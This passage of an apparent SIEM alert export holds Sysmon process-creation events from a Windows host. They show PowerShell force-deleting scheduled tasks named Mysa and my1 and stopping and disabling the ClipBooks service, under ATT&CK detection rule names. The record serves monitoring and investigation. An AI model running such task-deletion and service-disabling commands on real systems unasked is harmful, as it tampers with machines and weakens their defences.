{df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:38.695"",""processGuid"":""{df9fc3d3-b416-5ecf-0000-0010ab0a3100}"",""processId"":""6716"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Mysa3 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:06.638",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:38.638 +ProcessGuid: {df9fc3d3-b416-5ecf-0000-0010a6073100} +ProcessId: 2872 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Mysa2 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Mysa2 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:38.646508700Z"",""eventRecordID"":""3929"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:38.638\r\nProcessGuid: {df9fc3d3-b416-5ecf-0000-0010a6073100}\r\nProcessId: 2872\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Mysa2 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:38.638"",""processGuid"":""{df9fc3d3-b416-5ecf-0000-0010a6073100}"",""processId"":""2872"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Mysa2 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:06.594",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:38.590 +ProcessGuid: {df9fc3d3-b416-5ecf-0000-001004033100} +ProcessId: 3952 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Mysa1 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Mysa1 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:38.597194700Z"",""eventRecordID"":""3928"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:38.590\r\nProcessGuid: {df9fc3d3-b416-5ecf-0000-001004033100}\r\nProcessId: 3952\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Mysa1 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:38.590"",""processGuid"":""{df9fc3d3-b416-5ecf-0000-001004033100}"",""processId"":""3952"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Mysa1 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:06.588",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:38.501 +ProcessGuid: {df9fc3d3-b416-5ecf-0000-001023013100} +ProcessId: 5396 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Mysa /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Mysa /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:38.514221500Z"",""eventRecordID"":""3927"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:38.501\r\nProcessGuid: {df9fc3d3-b416-5ecf-0000-001023013100}\r\nProcessId: 5396\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Mysa /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:38.501"",""processGuid"":""{df9fc3d3-b416-5ecf-0000-001023013100}"",""processId"":""5396"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Mysa /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:06.546",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:38.376 +ProcessGuid: {df9fc3d3-b416-5ecf-0000-0010a4fe3000} +ProcessId: 2876 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN my1 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN my1 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:38.382563200Z"",""eventRecordID"":""3926"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:38.376\r\nProcessGuid: {df9fc3d3-b416-5ecf-0000-0010a4fe3000}\r\nProcessId: 2876\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN my1 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:38.376"",""processGuid"":""{df9fc3d3-b416-5ecf-0000-0010a4fe3000}"",""processId"":""2876"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN my1 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:06.517",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:38.320 +ProcessGuid: {df9fc3d3-b416-5ecf-0000-00108dfc3000} +ProcessId: 6204 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop ClipBooks +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop ClipBooks",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:38.323668600Z"",""eventRecordID"":""3924"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:38.320\r\nProcessGuid: {df9fc3d3-b416-5ecf-0000-00108dfc3000}\r\nProcessId: 6204\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop ClipBooks\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:38.320"",""processGuid"":""{df9fc3d3-b416-5ecf-0000-00108dfc3000}"",""processId"":""6204"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop ClipBooks"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:06.503",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:38.291 +ProcessGuid: {df9fc3d3-b416-5ecf-0000-00108efb3000} +ProcessId: 6148 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config ClipBooks Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config ClipBooks Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:38.295871900Z"",""eventRecordID"":""3923"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:38.291\r\nProcessGuid: {df9fc3d3-b416-5ecf-0000-00108efb3000}\r\nProcessId: 6148\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config ClipBooks Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 